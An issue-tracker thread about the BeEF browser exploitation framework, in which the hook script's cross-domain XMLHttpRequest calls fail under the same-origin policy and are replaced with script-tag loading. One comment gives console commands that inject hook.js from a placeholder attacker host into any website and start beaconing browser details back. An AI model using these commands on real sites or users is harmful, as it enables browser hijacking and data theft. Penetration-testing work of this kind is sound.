Use of XMLHTTPRequest by the beef hook triggers same origin policy in IE and Chrome

[passbe]

What steps will reproduce the problem?

1. Run an instance of beef on beef-domain.com
2. Create a hook page on pwned-domain.com and browse there with IE or Chrome
3. Since the domains are different, and the beef hook is attempting to retrieve information from said different domain using XMLHTTPRequest, it triggers same origin policy on IE and Chrome. Also the init script fails in firefox.

Browser Errors:

Chrome:

XMLHttpRequest cannot load http://beef-domain/init. Origin http://pwned-domain is not allowed by Access-Control-Allow-Origin.

IE:

Access Denied Error

Google Code Issue: http://code.google.com/p/beef/issues/detail?id=197

[passbe]

yori.kvi...@gmail.com on January 05, 2011 03:52:22:

An easier technique for reproducing the error:

• These instructions will allow you to hook any webpage manually
• Go to the website of your choice (youtube.com, facebook,com, google.com, etc...)
• In google chrome, press Ctrl + Shift + J to open the developer tools
• In the console type the following 2 javascript commands one after the other:
  1. script = document.createElement('script'); script.src="http://beef-domain:3000/hook.js"; document.body.appendChild(script);
  2. if (!beef.pageIsLoaded) { beef.pageIsLoaded = true; beef.net.sendback_browser_details(); beef.updater.execute_commands(); beef.updater.check(); }
• Your browser is now hooked, in google chrome you will now receive the above mentioned error
  
  Google Code Comment: http://code.google.com/p/beef/issues/detail?id=197#c1

[passbe]

wade@bindshell.net on January 05, 2011 19:11:00:

This bug is confirmed. XMLHttpRequest is not cross domain. Chrome screen shot attached.

The PHP version of beef used a different method in the include() function. It created a script element and appended it to the DOM. This is likely to be the best fix. The first place that will need updating is the raw_request() function. Also, the get_ajax method is probably redundant.

http://code.google.com/p/beef/source/browse/trunk/modules/beefjs/net.js?r=672 raw_request()
http://code.google.com/p/beef/source/browse/branches/PHPBeEF/hook/beefmagic.js.php?r=672 include()

            var html_doc = document.getElementsByTagName('head').item(0);
            var js = document.createElement('script');
            js.src = script_filename;
            js.type = 'text/javascript';
            js.defer = true;
            html_doc.appendChild(js);
            return js; 

Google Code Comment: http://code.google.com/p/beef/issues/detail?id=197#c3

[passbe]

yori.kvi...@gmail.com on January 05, 2011 21:14:34:

I would suggest using jQuery for the relevant code to deal with any current/future cross-browser javascript issues. Especially since this is such a core part of beef.

Google Code Comment: http://code.google.com/p/beef/issues/detail?id=197#c4

[passbe]

wade@bindshell.net on January 07, 2011 20:30:27:

The fix for this issue was added in r680.

jQuery.getScript() is now used to load the cross domain instructions from the framework. Scripts are loaded and executed instead of using XMLHttpRequests.

Google Code Comment: http://code.google.com/p/beef/issues/detail?id=197#c5

[passbe]

scotty.b...@gmail.com on January 07, 2011 23:04:48:

Verified on Ubuntu with FF and Chrome, and Win7 with IE8/Chrome/FF and OSX on Chrome and FF by Wade.

Google Code Comment: http://code.google.com/p/beef/issues/detail?id=197#c6